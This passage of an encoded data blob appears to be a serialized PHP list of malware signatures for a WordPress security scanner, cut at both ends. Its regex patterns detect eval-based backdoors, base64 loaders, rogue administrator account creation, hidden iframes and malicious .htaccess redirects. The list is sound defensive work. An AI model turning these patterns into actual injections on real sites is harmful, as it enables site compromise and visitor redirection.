jI6e2k6MDtzOjU6IkZDVktwIjtpOjE7czoxOTE6Ii9eLio8XD9bcGhcc1=qKGluY2x1ZGV8cmVxdWlyZSkoX29uY2UpP1woLit3cC1jb25maWdcLnBocFsiJ1xzXCk7XSsoXEA_aW5pX3NldFwoW15cKV=rW1wpO1xzXSspKy4rPyhteXNxbF9xdWVyeVwoWyciXVVQREFURVtcc1x7JyIuXStcJHRhYmxlX3ByZWZpeFtcc1x9JyIuXSt1c2Vyc1xzK1NFVFxzK3VzZXJfcGFzcy4rKXsyLH=kL2lzIjt9czoxMTA6InBocCBpZiBSRVFVRVNUIGFkZF9hY3Rpb24gZnVuY3Rpb24gZ2xvYmFsIGlmIGdldF9vcHRpb24gcmV=dXJuIG9iX3N=YXJ=IHdwX3Jld3JpdGUtPmZsdXNoX3J1bGVzIHdwX2NhY2hlX2ZsdXNoIjthOjI6e2k6MDtzOjU6IkgxOURCIjtpOjE7czo1NDk6Ii88XD9bcGhcc1=rKD86aWZccypcKFteXCldKlwkXyhQT1N8UkVRVUVTfEdFKVRbXlx7XStbXHtcc1=rKCl8YWRkX2FjdGlvblxzKlwoW14sXSssXHMqKFsnIl=pKFthLXpfMC=5XSspWyciXCk7XHNcfV=rKCl8ZnVuY3Rpb25ccytcNFteXHtdK1tce1xzXSsoKSl7M31cMlw1XDYoKChpbmNsdWRlfHJlcXVpcmUpKF9vbmNlKT9cKFteO1=rO1xzKnxpZltcc1woXCFdK3VzZXJuYW1lX2V4aXN=c1woW15ce1=rW1x7XHNdKykqKFwkW2Etel8wLTldKylccyo9XHMqd3BfY3JlYXRlX3VzZXJcKFteO1=rO1xzKihcJFthLXpfMC=5XSspXHMqPVxzKm5ld1xzK1dQX1VzZXJbXChcc1=rXDExW1wpO1xzXStcMTJbXHNcLT5dK3NldF9yb2xlW1woXHMnIl=rYWRtaW5pc3RyYXRvcnwoZ2xvYmFsW147XSo7XHMqKT9pZltcc1woXCFdK2dldF9vcHRpb25cKFteXCldK1tcKVxzXHtdK3JldHVyblteO1=qO1tcc1x9XStvYl9zdGFydFwoXCk7XHMqXD8-LitcJHdwX3Jld3JpdGUtPmZsdXNoX3J1bGVzXChcKTtccyp3cF9jYWNoZV9mbHVzaFwoKVsiJ1xzXCk7XHNcfV=rKCR8XD8-KS9pcyI7fX1zOjg6Imh=YWNjZXNzIjthOjE=OntzOjI4OiJleGNlc2l2ZSBzcGFjZXMgaW4gLmh=YWNjZXNzIjthOjI6e2k6MDtzOjU6IkVBODdwIjtpOjE7czozMToiL1tcclxuXSsoW1x=IF17MzB9fFtcdF17MTB9KS4qLyI7fXM6MjY6ImV4Y2VzaXZlIHRhYnMgaW4gLmh=YWNjZXNzIjthOjI6e2k6MDtzOjU6IkVBODhTIjtpOjE7czozMjoiL14oW1x=IF17MzB9fFtcdF17MTB9KS4qW1xyXG5dKy8iO31zOjIyOiJSZXdyaXRlUnVsZSBtb2JpbGUgMzAyIjthOjI6e2k6MDtzOjU6IkQ=NUU5IjtpOjE7czoxMzg6Ii9SZXdyaXRlRW5naW5lIG9uLis_UmV3cml=ZVJ1bGUgXF5bXChdP1wuXCpbXCldP1wkIGh=dHA6XC9cLyhtb2JpbGUtLis_fC4rP2NvdW5=KGVyKT9cLnBocHwuKz9cP2g9WzAtOV=rKSBcWyhMXCwpP1IoPVswLTldezN9KT8oXCxMKT9cXS9zaSI7fXM6MjY6InBocF92YWx1ZSBhdXRvX2FwcGVuZF9maWxlIjthOjI6e2k6MDtzOjU6IkQzQzZGIjtpOjE7czozMToiL3BocF92YWx1ZSBhdXRvX2FwcGVuZF9maWxlIC4rLyI7fXM6NDc6IlRhZ2VkIFJld3JpdGVDb25kIEhUVFBfUkVGRVJFUiBSZXdyaXRlUnVsZSBIVFRQIjthOjI6e2k6MDtzOjU6IkQzSjZ3IjtpOjE7czoxNjc6Ii9cI1thLXpBLVowLTldK1wjLis_UmV3cml=ZUVuZ2luZSBvbltcclxuIFx=XStSZXdyaXRlQ29uZCBcJVx7SFRUUF9SRUZFUkVSXH=uKz9SZXdyaXRlUnVsZSBcXlwoXC5cKlwpXCQgaHR=cDpcL1wvLis_IFxbKExcLCk_Uj1bMC=5XXszfShcLEwpP1xdLis_XCNcL1thLXpBLVowLTldK1wjL3NpIjt9czoyNzoiRXJyb3JEb2N1bWVudCA=MDQgd3BwcG=ucGhwIjthOjI6e2k6MDtzOjU6IkRCSTYwIjtpOjE7czozMjoiL=Vycm9yRG9jdW1lbnQgNDA=IC4rd3BwcG1cLnBocC8iO31zOjU1OiJSZXdyaXRlQ29uZCBVU=VSX=FHRU5UIFJFRkVSRVIgUmV3cml=ZVJ1bGUgc3RhcnRpbmcucGhwIjthOjI6e2k6MDtzOjU6IkU4SDl2IjtpOjE7czo5MToiLyhSZXdyaXRlQ29uZCBcJVx7SFRUUF8oVVNFUl9BR=VOVHxSRUZFUkVSKVx9LitbXHJcbl=rKStSZXdyaXRlUnVsZS4rP1wvc3RhcnRpbmdcLnBocFw_LisvaSI7fXM6NDg6IlJld3JpdGVDb25kIEhUVFBfVVNFUl9BR=VOVCBSZXdyaXRlUnVsZSBodHRwIC5ydSI7YToyOntpOjA7czo1OiJGM1JCVyI7aToxO3M6MTA3OiIvKFJld3JpdGVFbmdpbmUgb25ccyspPyhSZXdyaXRlQ29uZCAuKj9IVFRQKFw6fF9BQ=NFUFR8X1VTRVJfQUdFTlQpLipccyspK1Jld3JpdGVSdWxlLio_IGh=dHAuKz9cLnJ1LipccyovaSI7fXM6NDk6IlJld3JpdGVDb25kIEhUVFBfVVNFUl9BR=VOVCBSZXdyaXRlUnVsZSBodHRwIC5waHAiO2E6Mjp7aTowO3M6NToiSDY4TW4iO2k6MTtzOjk4OiIvKFJld3JpdGVFbmdpbmUgb25ccyspPyhSZXdyaXRlQ29uZCAuKj9IVFRQKFw6fF9BQ=NFUFR8X1VTRVJfQUdFTlQpLis_Ym9=LitccyspK1Jld3JpdGVSdWxlLitccyovaSI7fXM6Nzk6IlJld3JpdGVFbmdpbmUgT24gUmV3cml=ZUJhc2UgUmV3cml=ZUNvbmQgUmV3cml=ZVJ1bGUgaW5kZXgucGhwIHBhc3NpbmcgdmFyaWFibGUiO2E6Mjp7aTowO3M6NToiRUNFOFMiO2k6MTtzOjE3NzoiL1Jld3JpdGVFbmdpbmUgT25ccytSZXdyaXRlQmFzZSBcLyhbYS16MC=5XF9cLV=rKVwvXHMrUmV3cml=ZVJ1bGUgXF5pbmRleFteXF1dK1xdXHMrKFJld3JpdGVDb25kIC4rXHMrKStSZXdyaXRlUnVsZSBcXlwoXC5cKlwpXCQgXC9cMVwvaW5kZXhcLnBocFw_W2EtejAtOVxfXC1dKz1cJDEgXFtbXlxdXStcXS9pIjt9czo2NDoiUmV3cml=ZUVuZ2luZSBvbiBSZXdyaXRlQ29uZCBIVFRQX1VTRVJfQUdFTlQgUmV3cml=ZVJ1bGUgaHR=cCBJUCI7YToyOntpOjA7czo1OiJHOUpBWSI7aToxO3M6MTkzOiIvKFJld3JpdGVFbmdpbmUgb25ccyspPyhSZXdyaXRlQ29uZCBcJVx7KFJFUVVFU1RfVVJJfEhUVFBfUkVGRVJFUnxIVFRQX1VTRVJfQUdFTlQpXH=oPyEgZmF2aWNvblwuaWNvIFxbKS4rXHMrKStSZXdyaXRlUnVsZSAuKiBodHRwOlwvXC8oPyExMjdcLnxcJVx7KEhUVFBfSE9TVHxSRU1PVEVfQUREUilcfXx3aWtpcGVkaWFcLm9yZykuKi9pIjt9czo=MjoiUmV3cml=ZUVuZ2luZSBvbiBVTkNPTkRJVElPTkFMIFJld3JpdGVSdWxlIjthOjI6e2k6MDtzOjU6IkgzSDg5IjtpOjE7czoxNDU6Ii8oUmV3cml=ZUNvbmRcc1wlXHtIVFRQXyhSRUZFUkVSfFVTRVJfQUdFTlQpXH1ccytcKGdvb2dsZS4rYmluZy4rXHMqKSpSZXdyaXRlUnVsZSBcXlteXHNdK1xzKy4rPyg_PCEoaW5kZXhcXHxtaW5pZnkpKVwucGhwXD9bXj1dKz1bXCRcJVx7XFxdKy4rL2kiO31zOjEwOToiUmV3cml=ZUNvbmQgRU5WOlJFRElSRUNUX1NUQVRVUyBSZXdyaXRlUnVsZSBSZXdyaXRlQ29uZCBSRUZFUkVSL1VTRVJfQUdFTlQgZ29vZ2xlL3lhaG9vL2JpbmcgUmV3cml=ZVJ1bGUgLnBocCI7YToyOntpOjA7czo1OiJHMTRCTSI7aToxO3M6MjYzOiIvUmV3cml=ZUNvbmRccytcJVx7RU5WXDpSRURJUkVDVF9TVEFUVVNcfVxzKzIwMFxzK1Jld3JpdGVSdWxlW1xeXC1cc1=rXFtbXlxdXStcXVxzKyhSZXdyaXRlQ29uZFxzK1wlXHtIVFRQXyhSRUZFUkVSfFVTRVJfQUdFTlQpXH1ccytcKCgoZ29vZ2xlfHlhaG9vfG1zbnxhb2x8YmluZykoXHx8XCkpKSsoXHMrXFtbXlxdXStcXSkqXHMrKStSZXdyaXRlUnVsZVxzK1xeXChbXlwpXStcKVwkXHMrW2Etel9cLTAtOV=rXC5waHBcP1wkMVxzK1teXF1dK1tcXVxzXSsvaSI7fXM6MjE6IkRpcmVjdG9yeUluZGV4ICFpbmRleCI7YToyOntpOjA7czo1OiJHNTRENyI7aToxO3M6NzM6Ii8oPzw9RGlyZWN=b3J5SW5kZXggKSg_IWluZGV4Lmh=bWwgfGluZGV4Lmh=bSApKC4rPykoPz1bXlwvXWluZGV4XC5waHApL2kiO319czo1OiJrbm93biI7YToxNzQ6e3M6MzM6IkNPT=tJRSBwcmVnX21hdGNoIGZ1bmN=aW9uX2V4aXN=cyI7YToyOntpOjA7czo1OiJIOUJBbyI7aToxO3M6NDUxOiIvPFw_W3BoXHNdKyhmdW5jdGlvblxzKyhbYS16XzAtOV=rKVtcc1woXSsoXCRbYS16XzAtOV=rKSpbXHNcKVx7XSsoKFwkW2Etel8wLTldKylccyo9XHMqaW1wbG9kZVwoW147XSt8KGFycmF5X1teO1=rO1xzKikqc3JhbmRcKChbYS16XzAtOV=rKVwoXClcKSk7Lis_KGlmW1xzXChdK2lzc2V=W1xzXChdK1wkX=NPT=tJRVxbLis_fHJldHVybiAoaW1wbG9kZVwoW147XSt8XDUpO1tcfVxzXSspKSooaWZbXHNcKFxAXStwcmVnX21hdGNoXCguKz9pZlxbXHNcKFxAXStwcmVnX21hdGNoXCguKz9pZltcc1woXEBdK2Z1bmN=aW9uX2V4aXN=c1woLis_KFxzK1x9KXszfXwoZWNob3xwcmludHxkaWUpW1xzXChdK1wyW1xzXChdK2FycmF5W1xzXCgwLTksXCldKztccyp8ZnVuY3Rpb25ccytcN1woLis_cmV=dXJuW147XSo7W1xzXH1dKygoaGVhZGVyfGVjaG8pXChbXjtdKjtccyopKykoJHxcPz4pL2lzIjt9czozMToic2NyaXB=IGdvb2dsZWJsb2djb25=YWluZXIgZXZhbCI7YToyOntpOjA7czo1OiJHQlI4TSI7aToxO3M6MTI2OiIvPHNjcmlwdFtePl=rKHNyYz1bJyJodHBzOl=rXC9cL2dvXC5bXlw_XStcPyh6b25lfGlkfHApKz1cZCtbJyJcJl1bXj5dKj58aWQ9Imdvb2dsZWJsb2djb25=YWluZXIiLitldmFsXCguKylccyo8XC9zY3JpcHQ-XHMqL2kiO31zOjIyOiJpbmNsdWRlIHBocDUucGhwIGFsb25lIjthOjI6e2k6MDtzOjU6IkY1TEJWIjtpOjE7czoxMDI6Ii88XD9bcGhcc1=raWZccypcKGlzW15cKV=rW1wpXHNce1=rXEA_aW5jbHVkZVwoKC4rP1wuaWNvfCdwaHA1XC5waHApWyInXVwpOyhccypkaWVbXjtdKjspP1tcc1x9XSpcPz4vaSI7fXM6Mjc6ImRvY3VtZW5=LndyaXRlIGlmcmFtZSBzbWFsbCI7YToyOntpOjA7czo1OiJFMkdDSCI7aToxO3M6MTYzOiIvKGRvY3VtZW5=XC53cml=ZVwoWyciXSk_PGlmcmFtZSBzcmM9WyciXWh=dHA6XC9cLyguKz8pKCAoaGVpZ2h=fHdpZHRoKT1bJyJdP1swLTVdWyciXT8pKyggc3R5bGU9WyciXXZpc2liaWxpdHk6W1x=IF=qaGlkZGVuW14-XSo-PFwvaWZyYW1lPnw-PFwvaWZyYW1lPlsnIl1cKSk7Ki9pIjt9czoyNzoiZG9jdW1lbnQud3JpdGUgaWZyYW1lIC5waHA1IjthOjI6e2k6MDtzOjU6IkQxRUp2IjtpOjE7czo2NToiL2RvY3VtZW5=XC53cml=ZVwoWyciXTxpZnJhbWUgLitsZWZ=XDpbIF=_LS4rPFwvaWZyYW1lPlsnIl1cKTsqL2kiO31zOjEwOiJhcnJheSBldmFsIjthOjI6e2k6MDtzOjU6Ikg4OE5rIjtpOjE7czoyNDk6Ii8oZnVuY3Rpb25ccysoW2Etel8wLTldKylcKChbXjtdKls7XHNcfV=rKSs_cmV=dXJuW147XSpbO1xzXH1dKyk_KChcJFtcLVw-XC5hLXpfMC=5XSspXHMqPVxzKigoKFsnIl=pLipcOFtcLlxzXSopK3woYXJyYXkoX21hcCl8c3RyX1tpXT9yZXBsYWNlKSpccypcKFteXCldKltcKVxzXSsoLFteXCldKltcKVxzXSspKik7XHMqKStldmFsXHMqKFwvXCpbXlwqXSooXCpbXlwqXC9dKikrXC9ccyopKlwoLio_KFwyfFw1KS4qW1wpXHNdKzsvaSI7fXM6MjU6ImRvY3VtZW5=LndyaXRlIGlmcmFtZSAucnUiO2E6Mjp7aTowO3M6NToiRTlKSWMiO2k6MTtzOjcxOiIvKGRvY3VtZW5=XC53cml=ZVwofGVjaG8gKVsnIl=8aWZyYW1lIC4rXC5ydVwvLis8XC9pZnJhbWU-WyciXVsgXCk7XSsvaSI7fXM6ODoiZXZhbCBoZXgiO2E6Mjp7aTowO3M6NToiSDdMOEYiO2k6MTtzOjgyOiIvXEA_ZXZhbFxzKlwoW2Etel8wLTlcc1woXSooWyInXSlbXjtdKihcXCh4WzAtOWEtZl17Mn18XGR7MiwzfSkpK1teO1=qXDFbXClcc1=qOy9pIjt9czoxOToiZnVuY3Rpb25fZXhpc3RzIGVtbyI7YToyOntpOjA7czo1OiJHMlM5MSI7aToxO3M6NzU6Ii88XD9bcGhcc1=qKGlmIFwoXCFmdW5jdGlvbl9leGlzdHNcKCdlbW8nXCkuK2V4aXQ7XH18d3BfZm9vdHNcKFwpOylccypcPz4vaSI7fXM6MzQ6ImZ1bmN=aW9uX2V4aXN=cyBiYXNlNjRfZGVjb2RlIGV2YWwiO2E6Mjp7aTowO3M6NToiRjQ3S1ciO2k6MTtzOjE1MDoiL2lmXHMqXChccypcIWZ1bmN=aW9uX2V4aXN=c1xzKlwoLitbXClcc1=rW1x7XHNdKmZ1bmN=aW9uXHMqW2EtelxfMC=5XStcKC4rW1wpXHNdK1tce1xzXCRhLXpcXzAtOVx9XHNcPVxAXSpiYXNlNjRfZGVjb2RlXHMqXCguK2V2YWxccypcKC4rW1wpO1xzXH1dKy9pIjt9czoyODoiZWNobyBnemluZmxhdGUgYmFzZTY=X2RlY29kZSI7YToyOntpOjA7czo1OiJIMU85OSI7aToxO3M6MTEwOiIvXCNbYS16X1wtPTAtOV=rXCNbXHNcQF=rZWNob1tcKFxzXEBdK2d6aW5mbGF=ZVtcKFxzXEBdK2Jhc2U2NF9kZWNvZGVbXChcc1=rLitbXClcc1=rO1xzKlwjXC9bYS16X1wtPTAtOV=rXCMvaSI7fXM6MjE6InByZWdfcmVwbGFjZSAvZSBhbG9uZSI7YToyOntpOjA7czo1OiJGNk85TSI7aToxO3M6MjA1OiIvPFw_W3BoXHNdKigoXEA_ZXJyb3JfcmVwb3J=aW5nXCh8XChcJFthLXpcXzAtOV=rXHMqPVxzKlwkXyhSRVFVRVN8R=V8UE9TKVRcWylbXlwpXSpbXClcJjtcc1=rKT9cQD9wcmVnX3JlcGxhY2VbXCggXHRdKyhbJyJdKShbXCFcL1wjXHxcQFwlXF5cKlx-XSkuKz9cNVtpbXN4XSplW2ltc3hdKlw=WyBcdF=qLFteLF=rLFteXCldK1tcKTtcc1=qKFw_PnwkKS9pIjt9czoxOToicHJlZ19yZXBsYWNlIC9lIGhleCI7YToyOntpOjA7czo1OiJIODdMaiI7aToxO3M6NDE=OiIvKChcL1wqKFteKl=qXCooPyFcLykpKlteKl=qXCpcL1xzKnxcL1wvLipccyp8KFwkW2Etel8wLTldKylccyo9Lis7XHMqKSooXCRbYS16XzAtOV=rKVxzKj1ccyphcnJheVwoKFteXCldKlwpKD8hOykpKlteXCldKlwpO1xzKmZvci4rP1w1LitbXHNce1=qXDQuK1tcc1x9XSopPygoXC97Mn=uKnxcJFthLXpfMC=5XStccyo9LispXHMqKSpcQD8oXCRbYS16XzAtOV=rfHByZWdfcmVwbGFjZSlccypcKFxzKihbJyJdKShbXCFcL1wjXHxcQFwlXF5cKlx-XXxcXFt4MC=5XXsxLDN9KS4rPyhcMTFbaW1zeF=qZVtpbXN4XSp8XFx4NjV8XFwxNDUpXDEwXHMqLFxzKihbJyJdXFx4WzAtOUEtRl17Mn18WyciXT9cJCg_IWNiLCBcJGVuY29kZWRfdmFsdWVcW1wka2V5XF1cKTspKD8hcmVwbFwuJzspKVteLF=rLFteXCldK1tcKTtcc1=qL2kiO31zOjMxOiJwcmVnX3JlcGxhY2UgL2Ugc3RyX3JlcGxhY2UgaGV4IjthOjI6e2k6MDtzOjU6IkY2RkluIjtpOjE7czoxNDY6Ii9cQD9wcmVnX3JlcGxhY2VccypcKFxzKlsnIl=uK1tcL1wjXHxdW2lzXSplW2lzXSpbJyJdXHMqLFxzKlxAPyhcJF8oUkVRVUVTfEdFfFBPUylUXFt8c3RyX3JlcGxhY2VcKChbJyJccyxcLlwkXSpcXHhbMC=5QS1GXVswLTlBLUZdKSspLipcKVtccztdKi9pIjt9czoxNzoiZXZhbCBmcm9tQ2hhckNvZGUiO2E6Mjp7aTowO3M6NToiRjhHREYiO2k6MTtzOjI5NzoiLyg8c2NyaXB=W14-XSo-XHMqKCgodmFyXHMqKT9bYS16XzAtOV=rXHMqKDtccypbYS16XzAtOV=rXHMqPVxzKlthLXpfMC=5XVtcc1wuXSpsZW5ndGh8W1wuPV=rXHMqKFsiJ1=pLio_XDZccyp8Wyw9XStccypcW1teXF1dKlxdK1xzKikrO1xzKikrZm9yW15ce1=rXHtccypbXlx9XStmcm9tQ2hhckNvZGVcKFteXH1dK1tcfVxzXSsoW2Etel8wLTldK1xzKj1bXjtdKztccyopKmRvY3VtZW5=XC53cml=ZVwofGV2YWxcKC4qZnJvbUNoYXJDb2RlXCgoXHMqWzAtOV=rXHMqLCkrKVteO1=rO1xzKjxcL3NjcmlwdD5ccyopKy9pIjt9czoyNToiaW5pX3Jlc3RvcmUgYmFzZTY=X2RlY29kZSI7YToyOntpOjA7czo1OiJIMU9OZyI7aToxO3M6OTc6Ii88XD9bcGhcc1=raW5pX3Jlc3RvcmVccypcKC4rXHMrLitiYXNlNjRfZGVjb2RlXHMqXCguK1xzKy4rcGhwXC5pbmkuK1xzKy4rZndyaXRlXHMqXChbXFNcc1=rXD8-L2kiO31zOjMzOiJlcnJvcl9yZXBvcnRpbmcgdmFyaWFibGUtZnVuY3Rpb24iO2E6Mjp7aTowO3M6NToiSDY3QlIiO2k6MTtzOjM=NjoiLzxcP1twaFxzXSsoXC9cKihbXipdKlwqKD8hXC8pKSpbXipdKlwqXC9ccyp8KGluaV9zZXR8ZXJyb3JfcmVwb3J=aW5nfHNldF9=aW1lX2xpbWl=KVwoW15cKV=qXCk7XHMqKStpZltcKFxzXStcIWRlZmluZWRcKFteXCldK1tcKVxzXStce1xzKmRlZmluZVwoW15cKV=rW1wpXHNdKztccyppZltcc1woXStcIWZ1bmN=aW9uX2V4aXN=c1woKFsiJ1=pLis_XDRcKVtcKVxzXHtdKmZ1bmN=aW9uXHMqKC4rPylcKFteXCldK1wpW1wpXHNce1=rLis_XDVcKFteXCldK1wpO1xzKihcJFtePVwoO1=rKVwoW15cKV=qXCkrO1xzKi4rXDZcKFteXCldKlwpKztccypyZXR1cm5bXjtdKzsoLiokfFxzKlw_PiguKiQpPykvaSI7fXM6MTk6ImVjaG8gc2NyaXB=IGlmcmFtZSAiO2E6Mjp7aTowO3M6NToiSDFOOWQiO2k6MTtzOjEzOToiL1wjW2Etel9cLT=wLTldK1wjW1xzXEBdK2VjaG8uKzxzY3JpcHQuK1wuY3JlYXRlRWxlbWVudFtcKFxzIiddK2lmcmFtZS4rXC5zdHlsZVwuKGxlZnR8dG9wKT1bJyJcXF=rLS4rPFwvc2NyaXB=Pi4rO1xzK1wjXC9bYS16X1wtPTAtOV=rXCMvaSI7fXM6MTM6ImV2YWwgX1JFUVVFU1QiO2E6Mjp7aTowO3M6NToiRzFWOHEiO2k6MTtzOjE2NjoiL1tcQF=qKGVycm9yX3JlcG9ydGluZ1woLitiYXNlNjRfZGVjb2RlXCguKykqKD88IWwpZXZhbFsgXHRdKihcL1wqLipcKlwvKSpbIFx=XSpcKFsgXHRdKihcL1wqLipcKlwvKSpbIFx=XSpcJF8oUkVRVUVTfEdFfFBPUylUXFsuKz9cXS4qP1wpWyBcdF=qKFwvXCouKlwqXC8pKlsgXHRdKjsvaSI7fXM6MTg6ImZvcmVhY2ggZXZhbCBhcnJheSI7YToyOntpOjA7czo1OiJIMTRMNyI7aToxO3M6MjI5OiIvKFwvXCpccysoW2Etel9cLTAtOV=rKVxzKlwqXC9ccyp8PFw_W3BoXHNdKykoXCRbYS16XzAtOV=rKVxzKj1ccyphcnJheVteO1=rO1xzKi4rP2Z1bmN=aW9uIChbYS16XzAtOV=rKVwoLis_cmV=dXJuW147XSo7WztcfVxzXSsoXCRbYS16XzAtOV=rKVxzKj1ccypcNFxzKlwoXHMqXDNbXjtdKztccypldmFsXChcNVteO1=rWyciXClcfTtcc1=rKFwvXCpccytcL1wyXHMqXCpcL3wuKz8oJHxcPz4pKS9pIjt9czozMToiZXhjZXNpdmUgc3BhY2VzIGluIGhhc2hlZCBibG9jayI7YToyOntpOjA7czo1OiJDQ1Y4RiI7aToxO3M6NTc6Ii9cI1thLXpBLVowLTldK1wjW1xuIFx=XXs1MH=uK1tcbiBcdF=rXCNcL1thLXpBLVowLTldK1wjLyI7fXM6Mjk6IkphdmFzY3JpcHQgb2JzY3VyZSBldmFsIGFycmF5IjthOjI6e2k6MDtzOjU6IkgzQTlkIjtpOjE7czoyNDY6Ii8oXC9cKlxzKihbMC=5YS1mXXszMn=pXHMqXCpcL1xzKnw8KHNjcmlwdClbXj5dKj5ccyopKnZhclxzK1thLXpfMC=5XStccyo9KFxzKltcWyxdXHMqKFsnIl=pKFxcP3hbMC=5YS1mXXsyfSkqXDUpK1tcc1xdXSs7XHMqZG9jdW1lbnRccyooKFxbW15cXV=rW1xdXHNdKykrKFwoKFthLXpfMC=5XSsoXFtbXlxdXStbXF1cc1=rKSopKikrXCkrWztcc1=qKSsoXC9cKltcc1wvXSpcMlxzKlwqXC9ccyp8PFwvXDNbXj5dKj5ccyopKi9pcyI7fXM6MzA6IkphdmFTY3JpcHQgZnVuY3Rpb24geFZpZXdTdGF=ZSI7YToyOntpOjA7czo1OiJENzhMaiI7aToxO3M6MTA3OiIvPHNjcmlwdCBsYW5ndWFnZT1bJyJdSmF2YVNjcmlwdFsnIl=-W1xyXG4gXHRdKmZ1bmN=aW9uIFthLXowLTldK1ZpZXdTdGF=ZVwoXCkoLis_W1xyXG4gXHRdKikrPzxcL3NjcmlwdD4vaSI7fXM6Mjk6ImFkZC1kaXYtY29udGVudCBWaWFncmEgQ2lhbGlzIjthOjI6e2k6MDtzOjU6IkQ=NkhiIjtpOjE7czo4OToiLzxcIS=tc3RhcnQtYWRkLWRpdi1jb25=ZW5=WzAtOV=qLS=-LitWaWFncmEuK=NpYWxpcy4rPFwhLS1lbmQtYWRkLWRpdi1jb25=ZW5=WzAtOV=qLS=-L2kiO31zOjIxOiJqYXZhc2NyaXB=IGFycmF5IGV2YWwiO2E6Mjp7aTowO3M6NToiRUNMTlYiO2k6MTtzOjkwOiIvdmFyXHMqW19cLVw-XC5hLXowLTldK1xzKj1ccypcW1xzKlsnIl=oXFx4WzAtOUEtRl17Mn=pK1siJ11bXlxdXSpcXS4rP2V2YWxccypcKC4rP1wpKzsqL2kiO31zOjI=OiJpc3NldCBSRVFVRVNUIGV2YWwgYWxvbmUiO2E6Mjp7aTowO3M6NToiRjhHQk8iO2k6MTtzOjE1NDoiLzxcP1twaFxzXSsoXCRbX1wtXD5cLmEtejAtOV=rXHMqPVxzKihbJyJdKS4rP1wyO1xzKikqaWZbXHNcKF=rKFthLXpfMC=5XStccypcKFxzKikqXCRfKFJFUVVFU3xHRXxQT1MpVFxbLisoc3lzdGVtfGV2YWwpXCguK1xzKmV4aXRbXjtdKls7XHMqXH1dKygkfFw_PikvaSI7fXM6MzQ6Imlzc2V=IEhUVFBfVVNFUl9BR=VOVCBoZWFkZXIgYWxvbmUiO2E6Mjp7aTowO3M6NToiRDFPTkYiO2k6MTtzOjk4OiIvPFw_cGhwIGlmXChpc3NldFwoXCRfU=VSVkVSXFtbJyJdSFRUUF9VU=VSX=FHRU5UWyciXVxdLitoZWFkZXJcKFsnIl1Mb2NhdGlvbjogaHR=cDpcL1wvLis7XH1cPz4vaSI7fXM6MjU6InN=cnJldiBBc3NlcnQgZXZhbCBiYXNlNjQiO2E6Mjp7aTowO3M6NToiRDI=SUgiO2k6MTtzOjIyMDoiL1tcclxuIFx=XSsuKz9cKFsiJ1=oXFwxNDV8ZSkoXFwxNjZ8dikoXFwxNDF8YSkoXFwxNTR8bCkoXFwwNTB8XCgpKFxcMTQyfGIpKFxcMTQxfGEpKFxcMTYzfHMpKFxcMTQ1fGUpKFxcMDY2fDYpKFxcMDY=fDQpKFxcMTM3fF8pKFxcMTQ=fGQpKFxcMTQ1fGUpKFxcMTQzfGMpKFxcMTU3fG8pKFxcMTQ=fGQpKFxcMTQ1fGUpKFxcMDUwfFwoKS4rP1xcMDUxXFwwNTFcXDA3M1siJ11cKTsvaSI7fXM6MjQ6IlJldHJ5IGJhc2U2NF9kZWNvZGUgQ3VybCI7YToyOntpOjA7czo1OiJIMlJKTSI7aToxO3M6Mjc1OiIvPFw_W1xzaHBdKlxAP2Vycm9yX3JlcG9ydGluZ1woW1xzMF=rXCk7XHMqKChcJFthLXpfMC=5XStccyo9XHMqKT8odXJsZGVjb2RlW1xzXChdKyk_XCRfQ=9PS=lFXFtbXlxdXStcXStbXCk7XHNdKykrLittYWlsXChbXlwpXStcKStbXHNce1=rcG9zdF9zdGF=c1woKC4rP2Z1bmN=aW9uXHMrKHBvc3Rfc3RhdHN8X2hvc3QyaW5=fG1jaHxzbXRwX2xvb2t1cHxwb3N=X21jaCkpezV9Litzb2NrZXRfY2xvc2VcKFteXCldK1wpK1s7XHNcfV=rZGllXChcKTtbXHNcfV=qKCR8XD8-KS9pcyI7fXM6MjA6InByZWdfcmVwbGFjZSBhbGwgaGV4IjthOjI6e2k6MDtzOjU6IkY3MTRPIjtpOjE7czo1NjoiL1xAKnByZWdfcmVwbGFjZVxzKlwoKFteXCldKj9ceFswLTlBLUZdezJ9KXsxNSx9Lis_XCk7L2kiO31zOjE=OiJpZnJhbWUgaW4gaGVhZCI7YToyOntpOjA7czo1OiJENTNIUCI7aToxO3M6NTY6Ii9cPGlmcmFtZSAuK1w8XC9pZnJhbWVcPltcclxuIFx=XSooPz1cPFwvaCh=bWx8ZWFkKVw-KS9pIjt9czozNjoiVGFnZ2VkIHNjcmlwdCB=cnkgZG9jdW1lbnQuYm9keSBldmFsIjthOjI6e2k6MDtzOjU6IkcyR=RHIjtpOjE7czoxODc6Ii88XCEtLVthLXpfMC=5XHNdKy=tPlxzKjxzY3JpcHQgLis_KGJkdl9yZWZfcGlkPShbMC=5XSspOy4rPzxcL3NjcmlwdD5ccyo8c2NyaXB=IC4rP3BpZD1cMnx=cnlce2RvY3VtZW5=XC5ib2R5Lis_ZXZhbCkuKz88XC9zY3JpcHQ-XHMqKDxub3NjcmlwdC4rPFwvbm9zY3JpcHQ-XHMqKT88XCEtLVtcL2Etel8wLTlcc1=rLS=-L2kiO31zOjI5OiJUYWdnZWQgdHJ5IGRvY3VtZW5=LmJvZHkgZXZhbCI7YToyOntpOjA7czo1OiJEM=o3TiI7aToxO3M6OTE6Ii9cL1wqWzAtOWEtZl=rXCpcL1tcclxuIFx=XSsuKz9=cnlce2RvY3VtZW5=XC5ib2R5Lis_ZXZhbC4rP1tcclxuIFx=XStcL1wqXC9bMC=5YS1mXStcKlwvL2kiO31zOjM3OiJldmFsIHZhcmlhYmxlLWZ1bmN=aW9uIGxvbmctbmItc3RyaW5nIjthOjI6e2k6MDtzOjU6IkY2TURoIjtpOjE7czoxNDE6Ii8oKFwvXC8uK3xcJFthLXpcXzAtOVxbXF1ce1x9JyJdK1xzKj1bXlw7XSs7KVxzKikqXEA_KGV2YWx8YXNzZXJ=KVwoKFwkW2EtelxfMC=5XFtcXVx7XH=nIl=rXCgpK1snIl1bYS16QS1aMC=5XC9cX1wtXCtcPVxyXG5dezIwMCx9WyciXVwpKzsvaSI7fXM6NDE6ImZ1bmN=aW9uIG9iX2dldF9sZXZlbCBvYl9zdGFydCBhZGRfYWN=aW9uIjthOjI6e2k6MDtzOjU6IkQzTEE=IjtpOjE7czoxODg6Ii9pZiBcKFwhZnVuY3Rpb25cX2V4aXN=c1woLis_XCkgXHtbXHJcbiBcdF=rZnVuY3Rpb24gLis_XCkgXHtbXHJcbiBcdF=raWYgXChcIW9iXF9nZXRcX2xldmVsXChcKVwpIG9iXF9zdGFydFwoLis_XCk7W1xyXG4gXHRdK1x9W1xyXG4gXHRdKyguK1tcclxuIF